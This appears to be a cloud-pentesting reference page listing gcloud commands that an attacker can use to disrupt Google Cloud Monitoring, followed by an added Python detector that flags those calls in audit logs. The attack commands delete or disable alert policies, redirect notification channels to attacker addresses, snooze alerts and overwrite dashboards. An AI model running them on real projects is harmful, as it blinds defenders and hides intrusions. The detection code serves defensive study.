For other ways to disrupt logs, check:
monitoring.alertPolicies.delete
Delete an alert policy:
gcloud alpha monitoring policies delete <policy>
monitoring.alertPolicies.update
Disrupt an alert policy:
# Disable policy
gcloud alpha monitoring policies update <alert-policy> --no-enabled
# Remove all notification channels
gcloud alpha monitoring policies update <alert-policy> --clear-notification-channels
# Change notification channels
gcloud alpha monitoring policies update <alert-policy> --set-notification-channels=ATTACKER_CONTROLLED_CHANNEL
# Modify alert conditions
gcloud alpha monitoring policies update <alert-policy> --policy="{ 'displayName': 'New Policy Name', 'conditions': [ ... ], 'combiner': 'AND', ... }"
# or use --policy-from-file <policy-file>
monitoring.dashboards.update
Modify a dashboard to disrupt it:
# Disrupt dashboard
gcloud monitoring dashboards update <dashboard> --config='''
displayName: New Dashboard with New Display Name
etag: 40d1040034db4e5a9dee931ec1b12c0d
gridLayout:
  widgets:
  - text:
      content: Hello World
'''
Prevent policies from generating alerts by creating a snooze:
# Stop alerts by creating a snooze
gcloud monitoring snoozes create --display-name="Maintenance Week" \
  --criteria-policies="projects/my-project/alertPolicies/12345,projects/my-project/alertPolicies/23451" \
  --start-time="2023-03-01T03:00:00.0-0500" \
  --end-time="2023-03-07T23:59:59.5-0500"
monitoring.snoozes.update
Update the timing of a snooze to prevent alerts from being created when the attacker is interested:
# Modify the timing of a snooze
gcloud monitoring snoozes update <snooze> --start-time=START_TIME --end-time=END_TIME
# Modify everything, including affected policies
gcloud monitoring snoozes update <snooze> --snooze-from-file=<file>
Update the labels of a channel to disrupt it:
# Delete or update labels, for example email channels have the email indicated here
gcloud alpha monitoring channels update CHANNEL_ID --clear-channel-labels
gcloud alpha monitoring channels update CHANNEL_ID --update-channel-labels=email_address=attacker@example.com
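Every command above is a write to the Monitoring API, so each one should leave a Cloud Audit Logs entry that defenders can watch for. The following is an added detection example, not part of the original page: it scans exported audit-log lines for those calls and ranks principals by how many distinct alerting controls they touched. The `methodName` strings are assumed to be the API's service and RPC names (confirm them against your own entries), and the sample lines, principals and the `approved` allowlist are constructed.

```python
import json
from collections import defaultdict

V3 = "google.monitoring.v3."
# Audit-log methodName -> IAM permission that authorizes the call (assumed mapping).
WATCHED = {
    V3 + "AlertPolicyService.DeleteAlertPolicy": "monitoring.alertPolicies.delete",
    V3 + "AlertPolicyService.UpdateAlertPolicy": "monitoring.alertPolicies.update",
    V3 + "SnoozeService.CreateSnooze": "monitoring.snoozes.create",
    V3 + "SnoozeService.UpdateSnooze": "monitoring.snoozes.update",
    V3 + "NotificationChannelService.UpdateNotificationChannel":
        "monitoring.notificationChannels.update",
    "google.monitoring.dashboard.v1.DashboardsService.UpdateDashboard":
        "monitoring.dashboards.update",
}

def _line(who, method, resource, code=0):
    """Build one constructed audit-log entry, trimmed to the fields used."""
    return json.dumps({"protoPayload": {
        "methodName": method, "resourceName": resource,
        "authenticationInfo": {"principalEmail": who},
        "status": {"code": code}}})

# Constructed sample input, not real log data.
SAMPLE = [
    _line("sre-bot@example.com", V3 + "SnoozeService.CreateSnooze", "projects/my-project/snoozes/1"),
    _line("dev@example.com", V3 + "AlertPolicyService.UpdateAlertPolicy", "projects/my-project/alertPolicies/12345"),
    _line("dev@example.com", V3 + "NotificationChannelService.UpdateNotificationChannel", "projects/my-project/notificationChannels/2"),
    _line("intern@example.com", V3 + "AlertPolicyService.DeleteAlertPolicy", "projects/my-project/alertPolicies/23451", code=7),
    _line("dev@example.com", V3 + "AlertPolicyService.ListAlertPolicies", "projects/my-project"),
    "not json",
]

def detect(lines, approved=frozenset()):
    """Return watched calls made by principals outside the approved set."""
    hits = []
    for line in lines:
        try:
            p = json.loads(line).get("protoPayload", {})
        except (ValueError, AttributeError):
            continue  # skip malformed or non-object lines
        perm = WATCHED.get(p.get("methodName"))
        who = p.get("authenticationInfo", {}).get("principalEmail", "unknown")
        if perm is None or who in approved:
            continue
        denied = p.get("status", {}).get("code", 0) != 0  # non-zero = failed attempt
        hits.append({"principal": who, "permission": perm,
                     "resource": p.get("resourceName", ""), "denied": denied})
    return hits

def triage(hits):
    """Rate a principal 'high' when it touched two or more distinct controls."""
    seen = defaultdict(set)
    for h in hits:
        seen[h["principal"]].add(h["permission"])
    return {who: "high" if len(perms) >= 2 else "review" for who, perms in seen.items()}
```

Denied attempts are kept in the results because a failed delete or update on an alert policy is still worth reviewing.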